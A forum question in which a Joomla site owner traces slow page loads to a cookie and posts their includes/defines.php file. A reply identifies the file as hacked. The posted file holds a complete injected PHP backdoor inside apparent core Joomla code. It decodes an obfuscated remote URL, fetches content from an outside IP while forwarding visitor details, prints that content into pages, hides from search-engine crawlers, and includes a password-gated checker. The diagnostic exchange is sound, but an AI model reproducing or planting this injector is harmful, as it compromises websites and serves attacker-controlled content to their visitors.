# How to find and change cookie "send for" option

Tags: javascript, php, facebook, cookies, joomla

After weeks of fruitless effort in trying to fix my joomla page load time I have finally tracked the problem down to a cookie named:

```
_PHP_SESSION_PHP

content: 321
send for: any type of connection
http only: no
path: /
```

If I have this cookie then the pages load in under 3 seconds. if I delete this cookie a page will load in 13 seconds and other pages will load in 3 again since the cookie is back.

Problem still: 10 seconds is too long to wait for the cookie and other services like facebook url scraping will time out after 10 seconds before they have received any page content.

I am a GUI geek and very timid and slow with code and terminal.

**I believe if the cookie was set to http only, then facebook wouldn't time trying to scrape my urls since it uses curl. 
Can anyone confirm if this would be the right way to do this, and How would I find and change this in my scripts?**

Also I think it's suspicious that my page needs 10 seconds to decide the user has no cookie. What could the reason for this be?

the only mention I can find of this cookie is in my mysite.com/includes/defines.php

```
$cookie_name = '_PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
    $url = base64_decode("aHR0cDovLzE3OC4zMy4yMDAuMTczL2Jsb2cvP21hcmlqdWFuYSZ1dG1fc291cmNlPTExNTQ5OjU5ODAwMDo3NTQ=");
    $code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
```

apache 2 php 5.5 joomla 3.4 centos 6

**Complete File:**

```
<?php
/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Global definitions
$parts = explode(DIRECTORY_SEPARATOR, JPATH_BASE);

// Defines.
define('JPATH_ROOT',          implode(DIRECTORY_SEPARATOR, $parts));
define('JPATH_SITE',          JPATH_ROOT);
define('JPATH_CONFIGURATION', JPATH_ROOT);
define('JPATH_ADMINISTRATOR', JPATH_ROOT . DIRECTORY_SEPARATOR . 'administrator');
define('JPATH_LIBRARIES',     JPATH_ROOT . DIRECTORY_SEPARATOR . 'libraries');
define('JPATH_PLUGINS',       JPATH_ROOT . DIRECTORY_SEPARATOR . 'plugins');
define('JPATH_INSTALLATION',  JPATH_ROOT . DIRECTORY_SEPARATOR . 'installation');
define('JPATH_THEMES',        JPATH_BASE . DIRECTORY_SEPARATOR . 'templates');
define('JPATH_CACHE',         JPATH_BASE . DIRECTORY_SEPARATOR . 'cache');
define('JPATH_MANIFESTS',     JPATH_ADMINISTRATOR . DIRECTORY_SEPARATOR . 'manifests');
//istart

function request_url_data($url) {
    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

error_reporting(0);

$_passssword = "83f3dd053ea030f23e91df313d65eb81";

if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
    echo(substr($tmp, 50));
    echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}

$cookie_name = '_PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
    $url = base64_decode("aHR0cDovLzE3OC4zMy4yMDAuMTczL2Jsb2cvP21hcmlqdWFuYSZ1dG1fc291cmNlPTExNTQ5OjU5ODAwMDo3NTQ=");
    $code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iend
```

Answer (score 0):

Have you tried decoding the base64_encode-grabble in your code? It basically says: you have been hacked...

Try this in a terminal window (one single line):

```
php -r 'echo base64_decode("aHR0cDovLzE3OC4zMy4yMDAuMTczL2Jsb2cvP21hcmlqdWFuYSZ1dG1fc291cmNlPTExNTQ5OjU5ODAwMDo3NTQ=");echo "\n";'
```

What comes out is the content of the grapple. This is also the reason your site is slow to load.